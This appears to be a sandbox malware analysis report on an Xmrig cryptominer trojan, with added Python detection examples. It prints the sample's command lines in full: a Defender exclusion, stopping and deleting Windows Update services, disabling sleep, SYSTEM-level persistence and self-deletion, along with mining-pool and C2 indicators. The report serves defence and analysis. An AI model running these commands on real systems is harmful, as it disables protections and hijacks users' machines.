Windows Analysis Report
8iTXwpHCHb.exe

Overview

General Information

Sample Name: 8iTXwpHCHb.exe
Analysis ID: 735874
MD5: e6001aac5a3ee379149fd36bb6fb0d6f
SHA1: 071044b203de973c31e2504411cfa445b95402cf
SHA256: e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2
Tags: exe, trojan

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Sigma detected: Stop multiple services
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Query firmware table information (likely to detect VMs)
Protects its processes via BreakOnTermination flag
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Creates files in the system32 config directory
Found hidden mapped module (file has been removed from disk)
Tries to evade analysis by executing a special instruction (VM detection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 8iTXwpHCHb.exe (PID: 5800 cmdline: C:\Users\user\Desktop\8iTXwpHCHb.exe MD5: E6001AAC5A3EE379149FD36BB6FB0D6F)
    • powershell.exe (PID: 1680 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5776 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 2160 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5248 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5744 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 2412 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 1020 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • reg.exe (PID: 5332 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 728 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 3736 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6056 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 2432 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 4904 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powercfg.exe (PID: 5868 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 5768 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 244 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 4952 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
    • powershell.exe (PID: 6104 cmdline: powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5712 cmdline: powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 1028 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • cmd.exe (PID: 5864 cmdline: cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • choice.exe (PID: 3672 cmdline: choice /C Y /N /D Y /T 3 MD5: EA29BC6BCB1EFCE9C9946C3602F3E754)
  • WindowsAutHost (PID: 964 cmdline: C:\Program Files\WindowsServices\WindowsAutHost MD5: 5B8C8BDDB55534C3C0DDA7CB094EEC00)
    • powershell.exe (PID: 1308 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4328 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 2448 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 3208 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 4764 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 476 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5356 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • reg.exe (PID: 5444 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5480 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5504 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5508 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5632 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 4696 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powercfg.exe (PID: 5456 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 2024 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 572 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 2224 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
    • powershell.exe (PID: 780 cmdline: powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe qeiyvjdhkxdq MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1004 cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 1248 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1688 cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4184 cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
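The process tree above is the whole installer chain in one place: a Defender exclusion for the user profile and Program Files, sc stop plus reg delete of the Windows Update services, powercfg timeouts zeroed so the miner is never suspended, a SYSTEM/Highest scheduled task (or an HKCU Run key when not admin), a choice-timer self-delete, and a wmic GPU inventory written to g.log by the hollowed conhost.exe. The following is an added example, not Joe Sandbox code or code from this sample: a rule set over process-creation command lines that groups hits by the root process so the chain is scored as a whole rather than as isolated LOLBin noise. The events are constructed from the tree (PID/PPID/command line only; the parent PID 4242 for the roots and the benign notepad.exe control are assumptions).

```python
"""Rule-based triage of process-creation command lines, grouped by the root
process that spawned them. Added example (not Joe Sandbox code); the events
below are constructed from the report's process tree."""
import re

# (rule name, pattern over the full command line); each maps to one step of
# the chain in the process tree above.
RULES = [
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("stop_update_services",
     re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("delete_service_key",
     re.compile(r"reg\s+delete\s+\"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\", re.I)),
    ("disable_sleep",
     re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I)),
    ("system_task_persistence",   # either the Win8+ cmdlet branch or the pre-Win8 schtasks branch
     re.compile(r"Register-ScheduledTask(?=.*-User\s+'System')(?=.*-RunLevel\s+'Highest')"
                r"|schtasks\s+/create(?=.*/ru\s+'?System'?)(?=.*/rl\s+highest)", re.I | re.S)),
    ("run_key_persistence",
     re.compile(r"reg\s+add\s+\"HK(CU|LM)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"", re.I)),
    ("delayed_self_delete",
     re.compile(r"choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\b", re.I)),
    ("gpu_inventory_to_file",
     re.compile(r"wmic\s+PATH\s+Win32_VideoController\s+GET", re.I)),
]

# Constructed events: (pid, ppid, cmdline). PPID 4242 stands in for explorer.exe
# (assumption); PID 2968 (the injected conhost.exe) is deliberately absent so the
# wmic branch resolves to its own root, as it would without the injection event.
SAMPLE_EVENTS = [
    (5800, 4242, r"C:\Users\user\Desktop\8iTXwpHCHb.exe"),
    (1680, 5800, "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    (5776, 5800, "cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & "
                 "reg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\UsoSvc\" /f"),
    (4904, 5800, "cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"),
    (6104, 5800, "powershell IF($admin) { Register-ScheduledTask -Action (New-ScheduledTaskAction "
                 "-Execute 'C:\\Program Files\\WindowsServices\\WindowsAutHost') -TaskName 'WindowsAutHost' "
                 "-User 'System' -RunLevel 'Highest' -Force } Else { reg add "
                 "\"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsAutHost\" /t REG_SZ /f "
                 "/d 'C:\\Program Files\\WindowsServices\\WindowsAutHost' }"),
    (5864, 5800, "cmd /c choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\user\\Desktop\\8iTXwpHCHb.exe\""),
    (1004, 2968, "cmd /c mkdir \"C:\\Program Files\\Google\\Libs\\\" & wmic PATH Win32_VideoController "
                 "GET Name, VideoProcessor > \"C:\\Program Files\\Google\\Libs\\g.log\""),
    (7000, 4242, r"C:\Windows\System32\notepad.exe C:\Users\user\notes.txt"),   # benign control
]


def match_rules(cmdline):
    """Names of every rule the command line trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def root_of(pid, parents, known):
    """Walk up the parent chain while the parent is itself in the event set."""
    seen = set()
    while parents.get(pid) in known and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def scan(events):
    """Map each root process to the set of rule names its tree tripped."""
    known = {pid for pid, _, _ in events}
    parents = {pid: ppid for pid, ppid, _ in events}
    hits = {}
    for pid, _, cmd in events:
        names = match_rules(cmd)
        if names:
            hits.setdefault(root_of(pid, parents, known), set()).update(names)
    return hits


def verdict(events, threshold=3):
    """Roots whose tree tripped at least `threshold` distinct rules: a single
    powercfg or sc stop is admin noise, the combination is the installer."""
    return {root: sorted(names) for root, names in scan(events).items()
            if len(names) >= threshold}


if __name__ == "__main__":
    for root, names in verdict(SAMPLE_EVENTS).items():
        print(root, names)
```

The threshold is the point of grouping by root: every individual command here is something an administrator might legitimately run, but one parent that spawns a Defender exclusion, update-service removal, sleep suppression and SYSTEM persistence within seconds is the pattern this sample and its WindowsAutHost copy both show twice in the tree.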
No configs have been found

Source      Rule               Description                                Author        Strings
dump.pcap   JoeSecurity_Xmrig  Yara detected Xmrig cryptocurrency miner   Joe Security

    Operating System Destruction

    Source: Process started, Author: Joe Security
    Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\8iTXwpHCHb.exe, ParentImage: C:\Users\user\Desktop\8iTXwpHCHb.exe, ParentProcessId: 5800, ParentProcessName: 8iTXwpHCHb.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 5776, ProcessName: cmd.exe
    Snort IDS alerts

    Timestamp                 Source IP    Destination IP  Src Port  Dst Port  Protocol  SID      Classtype
    11/02/22-12:58:39.104701  192.168.2.4  199.247.19.116  49695     80        TCP       2831812  A Network Trojan was detected
    11/02/22-12:58:39.057419  192.168.2.4  8.8.8.8         56572     53        UDP       2036289  A Network Trojan was detected
    11/02/22-12:58:40.227957  192.168.2.4  31.31.198.106   49696     80        TCP       2035420  A Network Trojan was detected

    AV Detection

    Source: 8iTXwpHCHb.exe | Virustotal: Detection: 37%
    Source: 8iTXwpHCHb.exe | ReversingLabs: Detection: 26%
    Source: 8iTXwpHCHb.exe | Avira: detected
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Avira: detection malicious, Label: HEUR/AGEN.1249215
    Source: 8iTXwpHCHb.exe | Joe Sandbox ML: detected
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Joe Sandbox ML: detected

    Bitcoin Miner

    Source: Yara match | File source: dump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Directory created: C:\Program Files\WindowsServices
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Directory created: C:\Program Files\Google\Libs
    Source: C:\Windows\System32\cmd.exe | Directory created: C:\Program Files\Google\Libs\g.log
    Source: 8iTXwpHCHb.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then sub rsp, 38h | 58_2_00007FF6935E7500
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then sub rsp, 38h | 58_2_00007FF6935EE4F0
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then push r13 | 58_2_00007FF6935E7430
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then sub rsp, 38h | 58_2_00007FF6935EB330
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then push r13 | 58_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h | 58_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then mov rax, qword ptr [rcx] | 58_2_00007FF6935E4860
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then push r13 | 58_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h | 58_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then push r13 | 58_2_00007FF6935F16D0
    Source: C:\Windows\System32\conhost.exe | Code function: 4x nop then push r13 | 58_2_00007FF6935F1610
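The WinRing0.pdb path above is what ties the dropped WR64.sys to the WinRing0 kernel driver, which matches the "drops a device driver" signature and is consistent with XMRig's use of that driver for MSR access. The path comes from the CodeView (RSDS) debug record of the image, which survives renaming of the file. As an added example that is not Joe Sandbox code, the following extracts every RSDS record from a PE image or memory dump by scanning for the magic (so it still works when the debug directory is damaged by packing) and matches the PDB path against a list of tooling an analyst would flag. The image bytes are constructed, not WR64.sys, and the GUID and age are placeholders.

```python
"""Pull CodeView (RSDS) PDB paths out of a PE image or memory dump and match
them against paths of known-abused tooling. Added example, not Joe Sandbox
code; SAMPLE_IMAGE is a constructed byte string, not WR64.sys."""
import struct
import uuid

# Lower-cased substrings to flag; the WinRing0 entry is the path the report
# shows for WR64.sys. Extend with your own tooling list (assumption).
SUSPECT_PDB_SUBSTRINGS = {
    "winring0": "WinRing0 ring-0 MSR/port I/O driver (dropped as WR64.sys by this sample)",
}


def rsds_records(data: bytes):
    """Yield (guid, age, pdb_path) for each RSDS record: 'RSDS' magic,
    16-byte GUID (little-endian fields), 4-byte age, NUL-terminated path."""
    pos = data.find(b"RSDS")
    while pos != -1:
        path_start = pos + 4 + 16 + 4
        if path_start <= len(data):
            guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
            age = struct.unpack_from("<I", data, pos + 20)[0]
            end = data.find(b"\x00", path_start)
            if end != -1:
                try:
                    yield guid, age, data[path_start:end].decode("ascii")
                except UnicodeDecodeError:
                    pass                       # random 'RSDS' bytes, not a record
        pos = data.find(b"RSDS", pos + 4)


def suspicious_pdb_paths(data: bytes):
    """List of (pdb_path, reason) for records whose path hits the watch list."""
    hits = []
    for _guid, _age, path in rsds_records(data):
        low = path.lower()
        for needle, why in SUSPECT_PDB_SUBSTRINGS.items():
            if needle in low:
                hits.append((path, why))
    return hits


# Constructed stand-in for a driver image: a stub MZ/PE header, one RSDS record
# carrying the PDB path from the report, then trailing bytes. GUID and age 3
# are placeholders, not values from WR64.sys.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 96
    + b"RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 3)
    + b"d:\\hotproject\\winring0\\source\\dll\\sys\\lib\\amd64\\WinRing0.pdb\x00"
    + b"\x00" * 16
)

if __name__ == "__main__":
    for guid, age, path in rsds_records(SAMPLE_IMAGE):
        print(guid, age, path)
    print(suspicious_pdb_paths(SAMPLE_IMAGE))
```

Because the scan is header-independent it can be run over the process memory dump the report references (the .sdmp entry) as well as the file on disk, which is how the same string turned up in both places above.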

    Networking

    Source: Traffic | Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:56572 -> 8.8.8.8:53
    Source: Traffic | Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.4:49695 -> 199.247.19.116:80
    Source: Traffic | Snort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.4:49696 -> 31.31.198.106:80
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
    Source: powershell.exe, 00000007.00000002.415968145.00000237E18BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.465776003.0000020D2401C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.644120231.0000019FA77D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.515105452.0000019FA77D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.623552015.000002376E64E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000007.00000002.419133402.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.375792050.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.392349439.00000237E1C6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
